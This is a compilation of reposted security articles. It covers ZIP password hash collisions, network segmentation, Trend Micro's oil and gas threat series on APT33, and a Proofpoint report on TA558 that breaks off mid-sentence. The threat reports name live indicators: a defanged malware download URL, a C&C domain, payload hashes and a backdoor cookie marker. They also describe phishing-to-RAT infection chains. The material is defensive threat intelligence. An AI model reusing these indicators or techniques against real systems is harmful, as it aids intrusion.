An encrypted ZIP file can have two correct passwords — here’s why

Password-protected ZIP archives are common means of compressing and sharing sets of files—from sensitive documents to malware samples to even malicious files (i.e. phishing “invoices” in emails).

But, did you know it is possible for an encrypted ZIP file to have two correct passwords, with both producing the same outcome when the ZIP is extracted?

A ZIP file with two passwords

Arseniy Sharoglazov, a cybersecurity researcher at Positive Technologies shared over the weekend a simple experiment where he produced a password-protected ZIP file called x.zip.

The password Sharoglazov picked for encrypting his ZIP was a pun on the 1987 hit that’s become a popular tech meme:

Nev1r-G0nna-G2ve-Y8u-Up-N5v1r-G1nna-Let-Y4u-D1wn-N8v4r-G5nna-D0sert-You

But the researcher demonstrated that when extracting x.zip using a completely different password, he received no error messages.

In fact, using the different password resulted in successful extraction of the ZIP, with original contents intact:

pkH8a0AqNbHcdw8GrmSp

different passwords for same ZIP
Two different passwords for same ZIP file result in successful extraction (Sharoglazov)

BleepingComputer was able to successfully reproduce the experiment using different ZIP programs. We used both p7zip (7-Zip equivalent for macOS) and another ZIP utility called Keka.

Like the researcher’s ZIP archive, ours was created with the aforementioned longer password, and with AES-256 encryption mode enabled.

While the ZIP was encrypted with the longer password, using either password extracted the archive successfully.

How’s this possible?

Responding to Sharoglazov’s demo, a curious reader, Rafa raised an important question, “How????”

Twitter user Unblvr seems to have figured out the mystery:

https://platform.twitter.com/embed/Tweet.html?creatorScreenName=BleepinComputer&dnt=false&embedId=twitter-widget-0&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiXSwidmVyc2lvbiI6bnVsbH0sInRmd19ob3Jpem9uX3RpbWVsaW5lXzEyMDM0Ijp7ImJ1Y2tldCI6InRyZWF0bWVudCIsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9iYWNrZW5kIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19yZWZzcmNfc2Vzc2lvbiI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfcmVzdWx0X21pZ3JhdGlvbl8xMzk3OSI6eyJidWNrZXQiOiJ0d2VldF9yZXN1bHQiLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3NlbnNpdGl2ZV9tZWRpYV9pbnRlcnN0aXRpYWxfMTM5NjMiOnsiYnVja2V0IjoiaW50ZXJzdGl0aWFsIiwidmVyc2lvbiI6bnVsbH0sInRmd19leHBlcmltZW50c19jb29raWVfZXhwaXJhdGlvbiI6eyJidWNrZXQiOjEyMDk2MDAsInZlcnNpb24iOm51bGx9LCJ0ZndfZHVwbGljYXRlX3NjcmliZXNfdG9fc2V0dGluZ3MiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X2VkaXRfZnJvbnRlbmQiOnsiYnVja2V0Ijoib2ZmIiwidmVyc2lvbiI6bnVsbH19&frame=false&hideCard=false&hideThread=false&id=1561112433812463616&lang=en&origin=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fan-encrypted-zip-file-can-have-two-correct-passwords-heres-why%2F&sessionId=a152f893a25a6e8ee78e7bde19e8d6acb85ac127&siteScreenName=BleepinComputer&theme=light&widgetsVersion=31f0cdc1eaa0f%3A1660602114609&width=550px

When producing password-protected ZIP archives with AES-256 mode enabled, the ZIP format uses the PBKDF2 algorithm and hashes the password provided by the user, if the password is too long. By too long, we mean longer than 64 bytes (characters), explains the researcher.

Instead of the user’s chosen password (in this case “Nev1r-G0nna-G2ve-…”) this newly calculated hash becomes the actual password to the file.

When the user attempts to extract the file, and enters a password that is longer than 64 bytes (“Nev1r-G0nna-G2ve-… “), the user’s input will once again be hashed by the ZIP application and compared against the correct password (which is now itself a hash). A match would lead to a successful file extraction.

The alternative password used in this example (“pkH8a0AqNbHcdw8GrmSp“) is in fact ASCII representation of the longer password’s SHA-1 hash.

SHA-1 checksum of “Nev1r-G0nna-G2ve-…” = 706b4838613041714e62486364773847726d5370.

This checksum when converted to ASCII produces: pkH8a0AqNbHcdw8GrmSp

Note, however, that when encrypting or decrypting a file, the hashing process only occurs if the length of the password is greater than 64 characters.

In other words, shorter passwords will not be hashed at either stage of compressing or decompressing the ZIP.

This is why when picking the long “Nev1r-G0nna-G2ve-… ” string as the password at the encryption stage, the actual password being set by the ZIP program is effectively the (SHA1) hash of this string.

At the decryption stage, if you were to enter “Nev1r-G0nna-G2ve-…,” it will be hashed and compared against the previously stored password (which is the SHA1 hash). However, entering the shorter “pkH8a0AqNbHcdw8GrmSp” password at the decryption stage will have the application directly compare this value to the stored password (which is, again the SHA1 hash).

The HMAC collisions subsection of PBKDF2 on Wikipedia provides some more technical insight to interested readers.

“PBKDF2 has an interesting property when using HMAC as its pseudo-random function. It is possible to trivially construct any number of different password pairs with collisions within each pair,” notes the entry.

“If a supplied password is longer than the block size of the underlying HMAC hash function, the password is first pre-hashed into a digest, and that digest is instead used as the password.”

But, the fact that there are now two possible passwords to the same ZIP does not represent a security vulnerability, “as one still must know the original password in order to generate the hash of the password,” the entry further explains.

Arriving at a perfect password

An interesting key aspect to note here is, ASCII representations of every SHA-1 hash need not be alphanumeric.

In other words, let’s assume we had chosen the following password for our ZIP file during this experiment. The password is longer than 64 bytes:

Bl33pingC0mputer-Sh0w-M3-H0W-t0-pR0Duc3-an-eNcRyPT3D-ZIP-File-in-the-simplest-way

It’s SHA-1 checksum comes out to be: bd0b8c7ab2bf5934574474fb403e3c0a7e789b61

And the ASCII representation of this checksum looks like a gibberish set of bytes—not nearly elegant as the alternative password generated by the researcher for his experiment:

gibberish password
ASCII representation of SHA-1 hash of Bl33pingC0mputer… password

BleepingComputer asked Sharoglazov how was he able to pick a password whose SHA-1 checksum would be such that its ASCII representation yields a clean, alphanumeric string.

“That’s why hashcat was used,” the researcher tells BleepingComputer.

By using a slightly modified version of the open source password recovery tool, hashcat, the researcher generated variations of the “Never Gonna Give You Up…” string using alphanumeric characters until he arrived at a perfect password.

“I tested Nev0rNev1rNev2r and so on… And I found the password I need.”

And, that’s how Sharoglazov arrived at a password that roughly reads like “Never Gonna Give You Up…,” but the ASCII representation of its SHA-1 checksum is one neat alphanumeric string.

For most users, creating a password-protected ZIP file with a choice of their password should be sufficient and that is all they would need to know.

But should you decide to get adventurous, this experiment provides a peek into one of the many mysteries surrounding encrypted ZIPs, like having two passwords to your guarded secret.

Source :
https://www.bleepingcomputer.com/news/security/an-encrypted-zip-file-can-have-two-correct-passwords-heres-why/

Enhance Security and Control Access to Critical Assets with Network Segmentation

Before COVID-19, most corporate employees worked in offices, using computers connected to the internal network. Once users connected to these internal networks, they typically had access to all the data and applications without many restrictions. Network architects designed flat internal networks where the devices in the network connected with each other directly or through a router or a switch.

But while flat networks are fast to implement and have fewer bottlenecks, they’re extremely vulnerable — once compromised, attackers are free to move laterally across the internal network.

Designing flat networks at a time when all the trusted users were on the internal networks might have been simpler and more efficient. But times have changed: Today, 55% of those surveyed say they work more hours remotely than at the physical office. Due to the rapid evolution of the way we work, corporations must now contend with:

  • Multiple network perimeters at headquarters, in remote offices and in the cloud
  • Applications and data scattered across different cloud platforms and data centers
  • Users who expect the same level of access to internal networks while working remotely

While this is a complex set of issues, there is a solution. Network segmentation, when implemented properly, can unflatten the network, allowing security admins to compartmentalize internal networks and provide granular user access.

What is network segmentation?

The National Institute of Standards and Technology (NIST) offers the following definition for network segmentation: “Splitting a network into sub-networks; for example, by creating separate areas on the network which are protected by firewalls configured to reject unnecessary traffic. Network segmentation minimizes the harm of malware and other threats by isolating it to a limited part of the network.”

The main principle of segmentation is making sure that each segment is protected from the other, so that if a breach does occur, it is limited to only a portion of the network. Segmentation should be applied to all entities in the IT environment, including users, workloads, physical servers, virtual machines, containers, network devices and endpoints.

Connections between these entities should be allowed only after their identities have been verified and proper access rights have been established. The approach of segmenting with granular and dynamic access is also known as Zero Trust Network Access (ZTNA).

As shown in Figure 1, instead of a network with a single perimeter, inside which entities across the network are freely accessible, a segmented network environment features smaller network zones with firewalls separating them.

Achieving network segmentation

Implementing segmentation may seem complex, and figuring out the right place to start might seem intimidating. But by following these steps, it can be achieved rather painlessly.

1. Understand and Visualize

Network admins need to map all the subnets and virtual local area networks (VLANs) on the corporate networks. Visualizing the current environment provides a lot of value right away in understanding both how to and what to segment.

At this step, network and security teams also need to work together to see where security devices such as firewalls, IPS and network access controls are deployed in the corporate network. An accurate map of the network and a complete inventory of security systems will help tremendously in creating efficient segments.

2. Segment and Create Policies

The next step in the process is to create the segments themselves: Large subnets or zones should be segmented, monitored and protected with granular access policies. Segments can be configured based on a variety of categories, including geo-location, corporate departments, server farms, data centers and cloud platforms.

After defining segments, create security policies and access-control rules between those segments. These polices can be created and managed using firewalls, VLANs or secure mobile access devices. In most cases, security admins can simply use existing firewalls or secure mobile access solutions to segment and create granular policies. It’s best for administrators to ensure that segments and policies are aligned with business processes.

3. Monitor and Enforce Policies

After creating segments and policies, take some time to monitor the traffic patterns between those segments. The first time the security policies are enforced, it may cause disruption to regular business functions. So it’s best to apply policies in non-blocking or alert mode and monitor for false positives or other network errors.

Next, it’s the time to enforce policies. Once the individual policies are pushed, each segment is protected from cyber attackers’ lateral movements and from internal users trying to reach resources they are not authorized to use. It’s a good idea to continuously monitor and apply new policies as needed whenever there are changes to networks, applications or user roles.

Policy-based segmentation: A way forward for distributed networks

What today’s enterprises require is a way to deliver granular policy enforcement to multiple segments within the network. Through segmentation, companies can protect critical digital assets against any lateral attacks and provide secure access to remote workforces.

The good news is that, with the power and flexibility of a next-generation firewall (NGFW) and with other technologies such as secure mobile access and ZTNA solutions, enterprises can safeguard today’s distributed networks by enforcing policy-based segmentation.

SonicWall’s award-winning hardware and advanced technologies include NGFWsSecure Mobile Access and Cloud Edge Secure Access. These solutions are designed to allow any network— from small businesses to large enterprises, from the datacenter to the cloud — to segment and achieve greater protection with SonicWall.

Source :
https://blog.sonicwall.com/en-us/2022/06/enhance-security-and-control-access-to-critical-assets-with-network-segmentation/

Oil and Gas Cybersecurity: Recommendations Part 3

The oil and gas industry continues to be a prime target for threat actors who want to disrupt the operation and wreak havoc. In part two, we discussed various threats that can affect an oil and gas company, including ransomware, DNS tunneling, and zero-day exploits. For the final installment of the series, we’ll investigate the APT33 case study—a group generally considered to be responsible for many spear-phishing campaigns targeting the oil industry and its supply chain. We’ll also lay out several recommendations to better strengthen the cybersecurity framework of oil and gas companies.

APT33: a case study

The group APT33 is known to target the oil supply chain, the aviation industry, and military and defense companies. Our team observed that the group has had some limited success in infecting targets related to oil, the U.S. military, and U.S. national security. In 2019, we found that the group infected a U.S. company providing support services to national security.

APT33 has also compromised oil companies in Europe and Asia. A large oil company with a presence in the U.K. and India had concrete APT33-related infections in the fall of 2018. Some of the IP addresses of the oil company communicated with the C&C server times-sync.com, which hosted a so-called Powerton C&C server from October to December 2018, and then again in 2019. A computer server in India owned by a European oil company communicated with a Powerton C&C server used by APT33 for at least three weeks in November and December 2019. We also observed that a large U.K.-based company offering specialized services to oil refineries and petrochemical installations was likely compromised by APT33 in the fall of 2018.

Read more: Obfuscated APT33 C&Cs Used for Narrow Targeting

table-1
Table 1. Known job offering campaigns of APT33

APT33’s best-known infection technique has been using social engineering through emails. It has been using the same type of lure for several years: a spear-phishing email containing a job opening offer that may look quite legitimate. There have been campaigns involving job openings in the oil and aviation industries.

The email contains a link to a malicious .hta file, which would attempt to download a PowerShell script. This would then download additional malware from APT33 so that the group could gain persistence in the target network. Table 1 lists some of the campaigns we were able to recover from data based on feedback from the Trend Micro™ Smart Protection Network™ infrastructure. The company names in the campaigns are not necessarily targets in the campaign, but they are usually part of the social lure used in the campaigns.

figure-1
Figure 1. PHP mailer script probably used by APT33. The script was hosted on the personal website of a European senator who had a seat on his nation’s defense committee.

The job opening social engineering lures are used for a reason: Some of the targets actually get legitimate email notifications about job openings for the same companies used in the spear-phishing emails. This means that APT33 has some knowledge of what their targets are receiving from legitimate sources.

APT33 is known to be related to the destructive malware called StoneDrill and is possibly related to attacks involving Shamoon, although we don’t have solid evidence for the latter.
Besides the relatively aggressive attacks of APT33 on the supply chain, we found that APT33 has been using several C&C domains, listed in Table 2, for small botnets composed of about a dozen bots each. It appears that APT33 has taken special care to make tracking more difficult.

The C&C domains are hosted on cloud-hosted proxies. These proxies relay URL requests from the infected bots to back-ends at shared web servers that may host thousands of legitimate domains. These back-ends are protected with special software that detects unusual probing from researchers. The back-ends report bot data back to a dedicated aggregator and bot control server on a dedicated IP address. The APT33 actors connect to these aggregators via a private VPN with exit nodes that are changed frequently. Using these VPN connections, the APT33 actors issue commands and retrieve data from the bots.

figure-2
Figure 2. Schema showing the multiple obfuscation layers used by APT33

Regarding APT33, we were able to track private VPN exit nodes for more than a year. We could cross relate the exit nodes with admin connections to servers controlled by APT33. It appears that these private VPN exit nodes are also used for reconnaissance of networks that are relevant to the supply chain of the oil industry. More concretely, we witnessed IP addresses that we believe are under the control of APT33 doing reconnaissance on the networks of an oil exploration company in the Middle East, an oil company in the U.S., and military hospitals in the Middle East.

table-2
Table 2. IP addresses associated with a few private VPN exit nodes connected to APT33

Table 2 shows a list of IP addresses that have been used by APT33. The IP addresses are likely to have been used for a longer time than the time frames indicated in the table. The data can be used to determine whether an organization was on the radar of APT33 for, say, reconnaissance or concrete compromises.

Security recommendations

Here are several general tips that may help companies in the oil and gas industry combat threat actors:

  • Perform data integrity checks
    While there may not be an immediate need for encrypting all data communications in an oil and gas company, there is some merit in taking steps to ensure data integrity. For example, regarding the information from the different sensors at oil production sites, the risk of tampering with oil production can be reduced by at least making sure that all data communication is signed. This can greatly decrease the risk of man-in-the-middle attacks where sensor values could be changed or where a third party could alter commands or inject commands without authorization.
  • Implement DNSSEC
    We have noticed that many oil and gas companies don’t have Domain Name System Security Extensions (DNSSEC) implemented. DNSSEC means digitally signing the DNS records of a domain name at the authoritative nameserver with a private key. DNS resolvers can check whether DNS records are properly signed.
  • Lock down domain names
    Domain names can potentially be taken over by a malicious actor, for example, through an unauthorized change in the DNS settings. To prevent this, it is important to use only a DNS service provider that requires two-factor authentication for any changes in the DNS settings of the domains of an organization.
  • Monitor SSL certificates
    For the protection of a brand name and for early warnings of possible upcoming attacks, it is important to monitor newly created SSL certificates that have certain keywords in the Common Name field.
  • Look out for business email compromise
    Protection against business email compromise (BEC) is possible through spam filtering, user training for spotting suspicious emails, and AI techniques that will recognize the writing styles of individuals in the company.
  • Require at least two-factor authentication for webmail
    A webmail hostname might get DNS-hijacked or hacked because of a vulnerability in the webmail software. And webmail can also be attacked with credential-phishing attacks; a well-prepared credential-phishing attack can be quite convincing. The risk of using webmail can be greatly reduced by requiring two-factor authentication (preferably with a physical key) and corporate VPNs for webmail access.
  • Hold employee training sessions for security awareness
    It is important to have regular training sessions for all employees. These sessions may include awareness training on credential phishing, spear phishing, social media use, data management, privacy policies, protecting intellectual property, and physical security.
  • Monitor for data leaks
    Watermarks make it easier to find leaked documents since the company can constantly monitor for these specific marks. Some companies specialize in finding leaked data and compromised credentials; through active monitoring for leaks, potential damage to the company can be mitigated earlier.
  • Keep VPN software up to date
    Several weaknesses in VPN software were found in recent years.36, 37 For various reasons, some companies do not update their VPN software immediately after patches become available. This is particularly dangerous since APT actors start to probe for vulnerable VPN servers (including those of oil companies) as soon as a vulnerability becomes public.
  • Review the security settings of cloud services
    Cloud services can boost efficiency and reduce cost, but companies sometimes forget to effectively use all security measures offered by cloud services. Some services help companies with cloud infrastructure security.

To learn more about digital threats that the oil and gas industry face, download our comprehend research here.

Source :
https://www.trendmicro.com/en_us/research/22/h/oil-gas-cybersecurity-recommendations-part-3.html

Oil and Gas Cybersecurity: Threats Part 2

The Russia-Ukraine war has posed threats to the oil and gas industry. Our team even uncovered several alleged attacks perpetrated by various groups during a March 2022 research. In part one, we exhibit how a typical oil and gas company works and why it can be susceptible to cyberattacks. We also explain different threats that can disrupt its operation.

In part two, let’s continue identifying threats that pose great risk to an oil and gas company.

Threats

  • Ransomware
    Ransomware remains a serious threat to oil and gas companies. Targeting individuals using ransomware is fairly easy for cybercriminals, even for those with a lower level of computer knowledge. The easiest business model consists of subscribing to ransomware-as-a-service (RaaS) offers on underground cybercrime marketplaces.18 Any fraudster can buy such a service and start delivering ransomware to thousands of individuals’ computers by using exploit kits or spam emails.

    During our research, we found that a U.S. oil and natural gas company was hit by ransomware, infecting three computers and its cloud backups. The computers that were targeted contained essential data for the company, and the estimated total loss was more than US$30 million. While we do not have additional details on this case, we believe the attackers did plan this attack carefully and were able to target a few strategic computers rather than hitting the company with a massive infection.

    Read more: Cuba Ransomware Group’s New Variant Found Using Optimized Infection Techniques
  • Malware
    Various kinds of malware serve different purposes, functioning and communicating between the infected computers and the C&C servers. Compromising and planting malware inside a target network is just the initial stage for attackers. Yet for several reasons, these actions can be detected after a while or even just deleted automatically by any antivirus or security solution.

    To avoid being kicked off from the network when the only available access is via their malware, attackers generally choose to regularly update their malware. And if possible, they use different malware families so that they have more than one way to access the compromised network.
  • Webshells
    Webshells are tiny files, generally written in PHP, ASP, or JavaScript language, that have been fraudulently uploaded to a web server belonging to a targeted entity. An attacker just needs to browse it to get access to the web server. Most common options for webshells provide upload or download file operations, command line (shell), and dump databases.

    Threat actors sometimes utilize webshells to ease their operations. They can use webshells to:
    • Download or upload files to the compromised web server;
    • Run other tools (such as credential stealers);
    • Maintain persistence on the compromised infrastructure;
    • Bounce to other servers and move on with more compromises; or
    • Steal information.
  • Cookies
    Cookies are small files sent from web servers and stored in the browser of an internet user. They serve different legitimate purposes, such as allowing a browser to know if the user is logged in or not (as in the case of authentication cookies) or storing stateful information (like items in shopping carts).

    Some variants of the backdoor BKDR64_RGDOOR22 used cookies23 to handle communications between the malware and its C&C server. They used the string “RGSESSIONID=” followed by encrypted content. Careful cookie field monitoring in HTTP traffic can help detect this kind of activity.
  • DNS tunnelling
    The most common way for malware to communicate with its C&C server is by using HTTP or HTTPS protocol. However, some attackers allow their malware to communicate via DNS tunnelling. In this content, DNS tunnelling exploits the DNS protocol to transmit data between the malware and its controller, via DNS queries and response packets.

    The DNS client software (the malware) sends data, generally encoded in some ways, prepended as the hostname of the DNS query.
  • Email as communication channel
    An APT attacker might want to use this method mostly for two reasons: email services, especially external online services, might be less monitored than other services in the compromised network, and it might provide an additional level of anonymity depending on the email service provider that is used.
  • Zero-day exploits
    More often than not, attackers use known exploits and only use zero-day exploits when really necessary. It doesn’t take much effort to compromise most networks, gain access and exfiltrate information with standard malware and tools.

    The Stuxnet case is a solid and interesting example of zero-day exploits, using four different types. No other known attack has been seen exploiting so many unpatched and unknown vulnerabilities — it has shown an extraordinary level of sophistication.

    Two years before Stuxnet, another malware from the Equation group27 was using two of the four zero-day exploits that Stuxnet used. The Equation group targeted many different sectors, including oil and gas, energy, and nuclear research. It showed advanced technical capabilities, including infecting the hard drive firmware of several major hard drive manufacturers, which had seemed impossible without the firmware source code.
  • Mobile phone malware
    There has been an increase in the use of mobile phone malware in recent years. It is typically used for cybercrime, but can also be utilized for espionage.

    The Reaper threat actor has developed Android malware, which we detect as AndroidOS_KevDroid. This malware has several functionalities, including starting a video or audio recording, downloading the address book from the compromised phone, fetching specific files, and reading SMS messages and other information from the phone.

    The MuddyWater APT group29 has used several variants of Android malware (AndroidOS_Mudwater.HRX, AndroidOS_HiddenApp.SAB, AndroidOS_Androrat.AXM, and .AXMA) posing as legitimate applications. These malware variants can completely take control of an Android phone, spread infecting links via SMS, and steal contacts, SMS messages, screenshots, and call logs.
  • Bluetooth
    Bluetooth can also be exploited by threat actors. And one of the most interesting recent discoveries in this regard is the USB Bluetooth Harvester.30 It is very uncommon, but it highlights the need for organizations to stay up to date on threat actor developments.
  • Cloud services
    Attackers can use legitimate cloud services to render the traffic between malware and the C&C server undetectable. For example, the Slub malware has been used for APT attacks. While it hasn’t affected the industry just yet, it bears mentioning as it use Git Hub (a software development platform), and Slack (a messaging service), for C&C communication can easily be copied by other threat actors.

In the final installation of our series, we’ll look at APT33—a group generally considered responsible for many spear-phishing campaigns targeting the oil industry and its supply chain. We’ll also discuss recommendations that oil and gas companies can utilize to further improve their cybersecurity.

To learn more about digital threats that the oil and gas industry face, download our comprehend research here.

Source :
https://www.trendmicro.com/en_us/research/22/h/oil-gas-cybersecurity-threats-part-2.html

Oil and Gas Cybersecurity: Industry Overview Part 1

The oil and gas industry is no stranger to major cybersecurity attacks, attempting to disrupt operations and services. Most of the best understood attacks against the oil industry are initial attempts to break into the corporate networks of oil companies.

Geopolitical tensions can cause major changes not only in physical space, but also in cyberspace. In March 2022, our researchers observed several alleged cyberattacks perpetrated by different groups. It has now become important more than ever to identify potential threats that may disrupt oil and gas companies, especially in these times when tensions are high.

Our survey also found that oil and gas companies have experienced disruptions with their supply due to cyberattacks. On average, the disruption lasted six days. The the financial damage amounts to approximately $3.3 million. Due to long disruption, the oil and gas industry has a much larger damage, too.

It is important to have an in-depth at cyberattacks than can disrupt oil and gas companies because they affect operations and profit in a major way. By looking closer at the infrastructure of an oil and gas company and identifying threats that can disrupt operation, a company can seal off loopholes and improve their cybersecurity framework.

The Infrastructure of a Typical Oil and Gas Company

An oil and gas company’s product chain usually has three parts—upstream, midstream, and downstream. Processes related to oil exploration and production is called an upstream, while the midstream refers to the transportation and storage of crude oil through pipelines, trains, ships, or trucks. Lastly, the downstream the production of end products. Cyber risks are present in all three categories, but for midstream and upstream, there are few publicly documented incidents.

Generally, an oil company has production sites where crude oil is extracted from wells, tank farms, where oil is stored temporarily, and a transportation system to bring the crude oil to a refinery. Transportation may include pipelines, trains, and ships. After processing in the refinery, different end products like diesel fuel, gasoline, and jet fuel are transported to tank farms and the products are later shipped to customers.

A gas company also typically has production sites and a transportation system such as railroads, ships, and pipelines. However, it needs compressor stations where the natural gas is compressed before transport. The natural gas is then transported to another plant that separates different hydrocarbon components, from natural gas, like LPG and cooking gas.

The intricate process of oil and gas companies mean they require constant monitoring to ensure the optimal performance measurement, performance improvement, quality control and safety.

Monitoring metrics include temperature, pressure, chemical composition, and detection of leaks. Some oil and gas production sites are in very remote locations where the weather can be extreme. For these sites, communication of the monitored metrics over the air, fixed (optic or copper) lines, or satellite is important. The systems of an oil and gas company is typically controlled by software and can be compromised by an attacker.

Threats

There are several threats that oil and gas companies should be aware of. The biggest threat to the industry is those that have a direct negative impact on the production of their end products. In addition, espionage is something that such companies need to defend themselves against, too.

In our in-depth research, the expert team at Trend Micro identified the following threats that can compromise oil and gas companies:

  • Sabotage
    In the context of the oil and gas industry, sabotage can be done by changing the behavior of software, deleting or wiping specific content to disrupt company activity or deleting or wiping as much content as possible on every accessible machine.

    Some examples of these kinds of sabotage operations have been reported broadly, the most famous being the Stuxnet case. Stuxnet was a piece of self-replicating malware that contained a very targeted and specific payload. Most infections of the worm were in Iran and analysis revealed that it was designed to exclusively target the centrifuge in the uranium enrichment facility of the Natanz Nuclear Plant in the country.
  • Insider threat
    In most cases, an insider is a disgruntled employee seeking revenge or wanting to make easy money by selling valuable data to competitors. This person can sabotage operations. They can alter data to create problems, delete or destroy data from corporate servers or shared project folders, steal intellectual property, and leak sensitive documents to third parties.

    Defense against insider threats is very complex since insiders generally have access to a lot of data. An insider also does not need months to know the internal network of the company — the insider probably already knows the inner workings of the organization.
  • Espionage and data theft
    Data theft and espionage can be the starting point of a larger destructive attack. Attackers often need specific information before attempting further action. Obtaining sensitive data like well drilling techniques, data on suspected oil and gas reserves, and special recipes for premium products can also translate to monetary gain for attackers.
  • DNS hijacking
    DNS hijacking is a form of data theft used by advanced attackers. The objective is to gain access to the corporate VPN network or corporate emails of governments and companies. We have seen several oil companies being targeted by advanced attackers who probably have certain geopolitical goals in mind.

    In DNS hijacking, the DNS settings of a domain name are modified by an unauthorized third party. The third-party can, for instance, add an entry to the zone file of a domain or alter the resolution of one or more of the existing hostnames. The simplest things the attacker can do are committing vandalism(defacement), leaving a message on the hijacked website, and making the website unavailable. This will usually be noticed quickly and the result may just be reputational damage.
  • Attacks on Webmail and Corporate VPN Servers
    While webmail and file-sharing services have become a vital tool for accessing emails and important documents on the go, these services can increase the possibility of a cyberattack on the surface.

    For instance, a webmail hostname might get DNS-hijacked or hacked because of the vulnerability in the webmail software. Webmail and file-sharing and collaboration platforms can be compromised in credential-phishing attacks.

    A well-prepared credential-phishing attack can be quite convincing, as when an actor registers a domain name can be quite convincing, as when an actor registers a domain name that resembles the legitimate webmail hostname, or when an actor creates a valid SSL certificate and chooses the targets within an organization carefully. The risk of webmail and third-party file-sharing services can be greatly reduced by requiring two factor authentication (preferably with a physical key) and corporate VPN access to these services.
  • Data leaks
    Data leaks have always been problematic. But the oil and gas industry is more susceptible to these threats because leaked information can be quite beneficial to a competitor. Data leaks can also cause substantial damage to a company’s reputation.

    During our research, we easily found dozens of sensitive documents related to the oil industry online. One way of finding these documents is by using specially crafted Google queries, called Google Dorks.

    Another way to find such content is to hunt for data on public services like Pastebin, an online service that allows anyone to copy and paste any text-based content and store it there, privately, or publicly. Another source of data is public sandboxes meant for analysis of suspicious files. Users can mistakenly send legitimate documents to these sandboxes for analysis. Once uploaded, these documents can be parsed or downloaded by third parties.
  • External emails
    In general, emails are well-protected inside companies. However, external emails cannot be controlled the same way. Employees regularly send emails to external addresses, hence some sensitive internal content ends up outside the company’s purview. Even worse, sensitive information can be copied to unsecured backup systems or stored locally on personal computers without standard corporate security protocols, which makes it easier for attackers to get hold of the information. Once a computer is compromised, an attacker can get the emails and use them in different ways to harm a company. For example, an actor could leak them on public servers or services like Pastebin.

In part two of our series, we look at additional threats that can compromise oil and gas companies, such as ransomware, malware, DNS tunneling, and zero-day exploits.

To learn more about digital threats that the oil and gas industry face, download our comprehend research here.

Source :
https://www.trendmicro.com/en_us/research/22/h/oil-gas-cybersecurity-part-1.html

Reservations Requested: TA558 Targets Hospitality and Travel 

Key Findings:

  • TA558 is a likely financially motivated small crime threat actor targeting hospitality, hotel, and travel organizations.
  • Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT.
  • TA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America.
  • TA558 increased operational tempo in 2022 to a higher average than previously observed. 
  • Like other threat actors in 2022, TA558 pivoted away from using macro-enabled documents in campaigns and adopted new tactics, techniques, and procedures. 

Overview

Since 2018, Proofpoint has tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads, typically remote access trojans (RATs), that can enable reconnaissance, data theft, and distribution of follow-on payloads.

Proofpoint tracked this actor based on a variety of email artifacts, delivery and installation techniques, command and control (C2) infrastructure, payload domains, and other infrastructure.

In 2022, Proofpoint observed an increase in activity compared to previous years. Additionally, TA558 shifted tactics and began using URLs and container files to distribute malware, likely in response to Microsoft announcing it would begin blocking VBA macros downloaded from the internet by default. 

TA558 has some overlap with activity reported by Palo Alto Networks in 2018, Cisco Talos in 2020 and 2021Uptycs in 2020, and HP in 2022. This report is the first comprehensive, public report on TA558, detailing activity conducted over four years that is still ongoing. The information used in the creation of this report is based on email campaigns, which are manually contextualized, and analyst enriched descriptions of automatically condemned threats.

Campaign Details and Activity Timeline

2018

Proofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and install malware. Two of the most common malware payloads included Loda and Revenge RAT. Campaigns were conducted exclusively in Spanish and Portuguese and targeted the hospitality and related industries, with “reserva” (Portuguese word for “reservation”) themes. Example campaign:

Subject: Corrigir data da reserva para o dia 03

Attachment: Booking – Dados da Reserva.docx

Attachment “Author”: C.D.T Original

SHA256: 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910

TA558

Figure 1: Example TA558 email from 2018

The documents leveraged remote template URLs to download an additional RTF document, which then downloaded and installed Revenge RAT. Interestingly, the term “CDT” is in the document metadata and in the URL. This term, which may refer to a travel organization, appears throughout TA558 campaigns from 2018 to present.

RTF payload URL example:

hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc

 

2019

In 2019, this actor continued to leverage emails with Word documents that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) to download and install malware. TA558 also began using macro-laden PowerPoint attachments and template injection with Office documents. This group expanded their malware arsenal to include Loda, vjw0rm, Revenge RAT, and others. In 2019, the group began occasionally expanding targeting outside of the hospitality and tourism verticals to include business services and manufacturing. Example campaign:

Subject: RESERVA

Attachment: RESERVA.docx

Attachment “Author”: msword

Attachment “Last Saved By”: Richard

SHA256: 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6e

TA558

Figure 2: Example TA558 email from 2019

TA558

Figure 3: Example TA558 Microsoft Word attachment from 2019

The documents leveraged a remote template relationship URL to download an additional RTF document. The RTF document (Author: obidah qudah, Operator: Richard) exploited the CVE-2017-11882 vulnerability to retrieve and execute an MSI file. Upon execution, the MSI file extracted and ran Loda malware.

In December 2019, Proofpoint analysts observed TA558 begin to send English-language lures relating to room bookings in addition to Portuguese and Spanish.

2020

In 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with macros, typically VBA macros, to download and install malware. This group continued to use a variety of malware payloads including the addition of njRAT and Ozone RAT.  

Hotel, hospitality, and travel organization targeting continued. Although the actor slightly increased its English-language operational tempo throughout 2020, most of the lures featured Portuguese and Spanish reservation requests. An example of a common attack chain in 2020:

